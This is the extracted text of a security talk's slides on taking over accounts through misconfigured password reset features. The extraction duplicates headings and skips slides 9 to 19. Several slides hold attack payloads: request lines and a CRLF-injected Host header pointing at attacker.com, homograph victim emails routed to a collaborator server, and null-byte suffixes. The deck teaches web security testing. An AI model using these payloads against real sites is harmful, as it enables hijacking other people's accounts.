Account Takeover via Exploiting
Misconfigured Password Reset Feature
By Tuhin Bose
Slide 2
Slide 2 text
Who am I?
Slide 3
Slide 3 text
Conclusion & QNA
Conclusion & QNA
What is Password
What is Password
Reset Feature?
Reset Feature?
Password Reset
Password Reset
Implementation
Implementation
Techniques Used by
Techniques Used by
Developers
Developers
ATO via Hacking
ATO via Hacking
Misconfigured
Misconfigured
Password Reset Feature
Password Reset Feature
AGENDA
Slide 4
Slide 4 text
What is Password Reset Feature?
Slide 5
Slide 5 text
Reset password is the action of invalidating the current password for an
account on an application and then setting a new one. Most of the
services have a password reset feature ("Forgot Password" service)
which allows you to reset your password.
Slide 6
Slide 6 text
Password Reset Implementation Techniques Used by Developers
Slide 7
Slide 7 text
Password Reset Implementation Techniques Used by
Developers
Slide 8
Slide 8 text
ATO via Hacking Misconfigured Password
Reset Feature
2. Modifying Request-URI
2. Modifying Request-URI
POST https://attacker.com/forgot-password HTTP/1.1
POST @attacker.com/forgot-password HTTP/1.1
POST :@attacker.com/forgot-password HTTP/1.1
POST /forgot-password@attacker.com HTTP/1.1
5. Insecure Direct Object Reference (IDOR)
5. Insecure Direct Object Reference (IDOR)
Use Param Miner to get extra parameters (or append
previously known parameters) in the request. Now try
IDOR.
Slide 20
Slide 20 text
5. Insecure Direct Object Reference
5. Insecure Direct Object Reference
Slide 21
Slide 21 text
6. Try homograph on password reset.
6. Try homograph on password reset.
email=victim@gmail.com
email=victim@gmаil.com
email=victim@xn--gmil-63d.com
Using Unicode: Cyrillic Small Letter A
Slide 22
Slide 22 text
6. Try homograph on password reset.
6. Try homograph on password reset.
https://github.com/UndeadSec/EvilURL
Slide 23
Slide 23 text
6. Try homograph on password reset.
6. Try homograph on password reset.
Steps to reproduce:
1. Create a new account with tuhin1729@gmail.com.xyz.burpcollaborator.net
2. Go to password reset page and enter this email:
tuhin1729@gmаil.com.xyz.burpcollaborator.net [Here "a" is different]
If it's vulnerable then you'll get the password reset link to your collaborator
server.
Slide 24
Slide 24 text
7. If they are sending an otp for password reset,
7. If they are sending an otp for password reset,
try 2fa bypass techniques.
try 2fa bypass techniques.
https://tinyurl.com/tuhin1729-2fa
Slide 25
Slide 25 text
8.
8. Append a .json after the endpoint.
Append a .json after the endpoint.
Slide 26
Slide 26 text
9. Weak Encryption
9. Weak Encryption
While generating password reset tokens,
sometimes developers use weak encryption
algorithms. For example, sometimes they
just encrypt the user-id/username of user +
timestrap using some weak encryption
algorithms .
Slide 27
Slide 27 text
POST /resetpassword?%0d%0aHost:%20attacker.com HTTP/1.1
10.
10. CRLF Injection
CRLF Injection
Slide 28
Slide 28 text
10.
10. CRLF Injection
CRLF Injection
Slide 29
Slide 29 text
11. Change the request method and content-type
and observe how the application is responding.
Original Modified
Slide 30
Slide 30 text
12. Append null bytes after your email and
observe the response.
{"email":"tuhinbose70@gmail.com"}
{"email":"tuhinbose70@gmail.com%00"}
%00, %0d%0a, %0d, %0a, %09, %0C, %20